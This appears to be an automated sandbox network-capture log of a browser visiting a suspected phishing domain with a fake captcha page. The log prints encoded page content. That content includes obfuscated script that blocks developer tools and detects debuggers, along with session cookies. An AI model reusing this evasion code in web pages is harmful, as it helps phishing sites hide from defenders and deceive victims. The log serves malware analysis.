                                                                                  2025-01-15 02:00:48 UTC1369INData Raw: 49 37 44 51 6f 67 49 43 41 67 64 32 6c 6b 64 47 67 36 49 44 45 77 4d 43 55 37 44 51 6f 67 49 43 41 67 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 67 4d 54 42 77 65 44 73 4e 43 6e 30 4e 43 67 30 4b 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 39 75 64 47 56 75 64 43 42 70 62 57 63 67 65 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 36 49 44 45 77 63 48 67 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 76 62 6e 52 6c 62 6e 51 67 61 57 35 77 64 58 51 67 65 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 42 6a 59 57 78 6a 4b 44 45 77 4d 43 55 67 4c 53 41 79 4d 48 42 34 4b 54 73 4e 43 69 41 67 49 43 42 77 59 57 52 6b 61 57 35 6e 4f
                                                                                  Data Ascii: I7DQogICAgd2lkdGg6IDEwMCU7DQogICAgbWFyZ2luLXRvcDogMTBweDsNCn0NCg0KLmNhcHRjaGEtY29udGVudCBpbWcgew0KICAgIHdpZHRoOiAxMDAlOw0KICAgIG1hcmdpbi1ib3R0b206IDEwcHg7DQp9DQoNCi5jYXB0Y2hhLWNvbnRlbnQgaW5wdXQgew0KICAgIHdpZHRoOiBjYWxjKDEwMCUgLSAyMHB4KTsNCiAgICBwYWRkaW5nO
                                                                                  2025-01-15 02:00:48 UTC1369INData Raw: 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41
                                                                                  Data Ascii: yKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA
                                                                                  2025-01-15 02:00:48 UTC1369INData Raw: 62 32 34 6f 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 48 56 48 5a 6b 4a 5a 56 58 68 42 55 6d 4d 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 5a 47 56 69 64 57 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 45 70 69 5a 6d 56 4e 61 32 78 4a 52 6b 6b 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 45 70 69 5a 6d 56 4e 61 32 78 4a 52 6b 6b 67 4c 53 42 31 52 32 5a 43 57 56 56 34 51 56 4a 6a 49 44 34 67 64 48 4e 68 64 6d 56 31 56 55 68 56 53 79 41 6d 4a 69 41 68 53 58 52 78 63 56 46 35 55 6d 5a 36 57 69 6b 67 65 77 30 4b 49 43 41
                                                                                  Data Ascii: b24oKSB7DQogICAgICAgIGNvbnN0IHVHZkJZVXhBUmMgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgZGVidWdnZXI7DQogICAgICAgIGNvbnN0IEpiZmVNa2xJRkkgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKEpiZmVNa2xJRkkgLSB1R2ZCWVV4QVJjID4gdHNhdmV1VUhVSyAmJiAhSXRxcVF5UmZ6Wikgew0KICA
                                                                                  2025-01-15 02:00:48 UTC1369INData Raw: 55 46 42 54 6c 4e 56 61 45 56 56 5a 30 46 42 51 56 6c 42 51 55 46 42 52 30 46 44 51 55 31 42 51 55 46 44 56 45 64 56 56 30 35 42 51 55 46 42 53 55 64 4f 53 56 56 72 4d 45 46 42 53 47 39 74 51 55 46 44 51 57 68 42 51 55 45 72 5a 30 46 42 51 55 6c 45 62 30 46 42 51 6a 46 4e 51 55 46 42 4e 6d 31 42 51 55 46 45 63 56 6c 42 51 55 46 59 59 30 70 35 4e 6c 56 55 64 30 46 42 51 55 5a 34 56 55 56 34 56 56 4a 52 51 55 46 42 54 44 68 6e 53 56 41 72 4c 30 46 4e 54 57 74 49 54 56 56 70 53 48 4e 56 61 6b 6c 4e 56 57 6c 49 4f 46 56 70 53 44 68 56 61 6b 67 34 57 57 70 49 4f 45 31 70 53 48 5a 35 4f 45 45 76 63 54 68 42 64 6e 6b 34 51 6d 5a 31 4f 45 4a 51 63 54 6c 42 4c 33 55 34 51 6c 42 31 4e 30 4a 4e 55 57 6c 49 4f 46 46 73 52 79 39 31 4f 55 4a 51 65 54 68 42 4c 79 73 76
                                                                                  Data Ascii: UFBTlNVaEVVZ0FBQVlBQUFBR0FDQU1BQUFDVEdVV05BQUFBSUdOSVVrMEFBSG9tQUFDQWhBQUErZ0FBQUlEb0FBQjFNQUFBNm1BQUFEcVlBQUFYY0p5NlVUd0FBQUZ4VUV4VVJRQUFBTDhnSVArL0FNTWtITVVpSHNVaklNVWlIOFVpSDhVakg4WWpIOE1pSHZ5OEEvcThBdnk4QmZ1OEJQcTlBL3U4QlB1N0JNUWlIOFFsRy91OUJQeThBLysv
                                                                                  2025-01-15 02:00:48 UTC1317INData Raw: 68 6c 56 31 68 32 63 6e 4a 32 64 6e 59 33 4d 6a 63 34 65 47 4d 76 4e 56 41 79 4e 7a 6b 35 4e 6c 5a 78 64 32 56 49 57 6a 4e 69 64 7a 52 52 5a 44 42 59 4e 57 78 6d 4c 7a 4e 69 55 48 70 75 4c 32 74 74 64 6d 4e 4f 4c 30 78 61 4c 33 46 6c 55 44 5a 74 64 31 6f 32 65 69 74 33 4f 57 56 51 4c 33 52 6e 56 6a 4d 30 59 55 74 4e 53 6a 6c 78 4f 53 73 33 53 45 4a 6e 4d 54 59 76 63 57 5a 42 64 30 4d 31 4d 54 68 74 5a 55 35 45 4e 30 5a 6e 4e 45 78 75 53 43 74 57 55 55 39 48 5a 47 4e 34 4f 46 42 75 57 43 74 61 4e 45 4a 51 5a 54 6c 34 61 44 64 57 65 6a 52 61 54 33 59 34 65 58 64 68 5a 55 56 36 4b 33 63 35 52 6b 68 51 4b 33 68 53 4e 58 45 32 61 32 56 70 4c 31 6c 6b 61 6e 70 79 4c 31 6c 33 4e 6b 74 6d 56 47 45 35 52 69 39 6d 52 6d 5a 6d 64 32 64 68 4b 32 6c 69 4e 47 52 4f 55
                                                                                  Data Ascii: hlV1h2cnJ2dnY3Mjc4eGMvNVAyNzk5NlZxd2VIWjNidzRRZDBYNWxmLzNiUHpuL2ttdmNOL0xaL3FlUDZtd1o2eit3OWVQL3RnVjM0YUtNSjlxOSs3SEJnMTYvcWZBd0M1MThtZU5EN0ZnNExuSCtWUU9HZGN4OFBuWCtaNEJQZTl4aDdWejRaT3Y4eXdhZUV6K3c5RkhQK3hSNXE2a2VpL1lkanpyL1l3NktmVGE5Ri9mRmZmd2dhK2liNGROU
                                                                                  2025-01-15 02:00:48 UTC1369INData Raw: 37 66 66 61 0d 0a 33 70 73 4f 45 35 4f 64 30 46 48 4d 6b 63 34 64 6d 68 77 54 32 39 42 63 56 45 31 62 6a 68 31 51 56 51 30 4e 6a 6b 34 53 30 4e 68 52 45 6c 56 51 7a 51 76 4b 32 64 49 5a 57 5a 54 4c 7a 52 70 65 6a 4d 72 4b 33 6f 34 53 30 4e 68 52 45 5a 56 52 44 51 76 4e 6d 64 49 4b 79 74 68 4f 44 63 30 55 55 52 49 4c 79 38 31 55 45 74 52 52 6c 56 48 51 6b 78 33 62 33 67 7a 5a 33 59 76 4b 7a 64 46 65 46 42 6e 4b 30 5a 70 56 45 6c 6b 53 48 5a 59 62 30 56 6f 51 31 51 72 4e 6b 46 6b 4e 54 6b 33 4f 44 5a 6b 65 55 46 44 59 55 52 4e 62 43 73 72 4d 55 74 48 57 6c 42 35 62 30 4a 77 61 6e 70 46 65 44 6c 42 61 31 4e 49 63 45 46 56 55 55 31 44 5a 6d 35 53 52 45 78 45 5a 30 70 35 52 30 46 49 61 31 42 70 51 33 64 6e 57 57 74 32 53 32 70 47 4d 6b 52 47 56 44 46 4a 51 55
                                                                                  Data Ascii: 7ffa3psOE5Od0FHMkc4dmhwT29BcVE1bjh1QVQ0Njk4S0NhRElVQzQvK2dIZWZTLzRpejMrK3o4S0NhREZVRDQvNmdIKythODc0UURILy81UEtRRlVHQkx3b3gzZ3YvKzdFeFBnK0ZpVElkSHZYb0VoQ1QrNkFkNTk3ODZkeUFDYURNbCsrMUtHWlB5b0JwanpFeDlBa1NIcEFVUU1DZm5SRExEZ0p5R0FIa1BpQ3dnWWt2S2pGMkRGVDFJQU


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.456747151.101.194.1374438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:49 UTC626OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                  Host: code.jquery.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://qelira.qelirathor.ru/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:49 UTC611INHTTP/1.1 200 OK
                                                                                  Connection: close
                                                                                  Content-Length: 89501
                                                                                  Server: nginx
                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                  ETag: "28feccc0-15d9d"
                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                  Accept-Ranges: bytes
                                                                                  Age: 2390976
                                                                                  Date: Wed, 15 Jan 2025 02:00:49 GMT
                                                                                  X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890022-NYC
                                                                                  X-Cache: HIT, HIT
                                                                                  X-Cache-Hits: 55, 0
                                                                                  X-Timer: S1736906450.654045,VS0,VE2
                                                                                  Vary: Accept-Encoding
                                                                                  2025-01-15 02:00:49 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                  2025-01-15 02:00:49 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                  Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                  2025-01-15 02:00:49 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                  Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                  2025-01-15 02:00:49 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                  Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                  2025-01-15 02:00:49 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                  Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                  2025-01-15 02:00:49 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                  Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.2.456746188.114.96.34438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:49 UTC1328OUTGET /favicon.ico HTTP/1.1
                                                                                  Host: qelira.qelirathor.ru
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://qelira.qelirathor.ru/1e66qhX9/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6Im1pWHgrbXRlRitOUXRqOWJpT1NUbFE9PSIsInZhbHVlIjoiNlcyeElxUEhQVFpnc2xqMkZXWVFSWk41QW1oTXg1TkFaUlVyUmZDaWg0eTJRd1ZxWWxieHBRMGlVaGpvRkhCc2JqbWhFalhkZE0wa1lBa2drL1pkb010UHdwY3k5bW9leE9FOTNrVkhSb0dJWTBPVkI2V1gxcWlIR0xTQmFqMmsiLCJtYWMiOiI5MjMyYThlMjUyODc3N2YyZGM0MDM3MTkyMjFjNjVkN2VjODYxN2RiNzkyNmNiMWUyYjI0ZTc3MDlhNmM3OTU5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikk2U2FZM2crZHBHQ1ZSRTRZWjlDQXc9PSIsInZhbHVlIjoiSG1nQWE1YnoyV2RlWCt4Q2pCL25nYkRDZ0U0MjE3NzhHb3pRemw3QkQzZjBFRk1PbHE4djZkQkpZQlNzZXEvRS9lRDFsUVFBWnlmaXBUcVRMZExFdEpmLytzeXdVaXBnZkp3bFFwblNFOGxnL0E4V0hCMVBZNjJjd2ZlbElRTy8iLCJtYWMiOiIyYTIyMzYzYmZmZTk2ZmEzYjkyOWZhNWZmNjRhZTdkZmEyNjY1MzE3YmFlOGU0MjZlNmIyNGZiNTdmYjc3NDNjIiwidGFnIjoiIn0%3D
                                                                                  2025-01-15 02:00:50 UTC1073INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 15 Jan 2025 02:00:50 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=14400
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zoE%2FDfIvSR3Nd1r1CiqMQFvJARc%2BYHi2NWPgdlrwkCaWYVVL8OLZGxrymBbzJN%2BD12%2BqkyBUKsk7j2BJZFuQHlrvu2nNljMZPgFBpuU%2FC37RHTfuNZMRIbAEdIgebA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Vary: Accept-Encoding
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4968&min_rtt=4805&rtt_var=42&sent=111&recv=69&lost=0&retrans=0&sent_bytes=111555&recv_bytes=9052&delivery_rate=7586992&cwnd=246&unsent_bytes=0&cid=266491b9652ab8c2&ts=769568&x=0"
                                                                                  CF-Cache-Status: EXPIRED
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 90224640994633eb-YUL
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=17823&min_rtt=17756&rtt_var=6706&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1906&delivery_rate=164451&cwnd=32&unsent_bytes=0&cid=dd1d57ff52ab036d&ts=2623&x=0"
                                                                                  2025-01-15 02:00:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.2.456748151.101.130.1374438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:50 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                  Host: code.jquery.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:50 UTC612INHTTP/1.1 200 OK
                                                                                  Connection: close
                                                                                  Content-Length: 89501
                                                                                  Server: nginx
                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                  ETag: "28feccc0-15d9d"
                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                  Accept-Ranges: bytes
                                                                                  Date: Wed, 15 Jan 2025 02:00:50 GMT
                                                                                  Age: 2390977
                                                                                  X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890067-NYC
                                                                                  X-Cache: HIT, HIT
                                                                                  X-Cache-Hits: 55, 39
                                                                                  X-Timer: S1736906450.439250,VS0,VE0
                                                                                  Vary: Accept-Encoding
                                                                                  2025-01-15 02:00:50 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
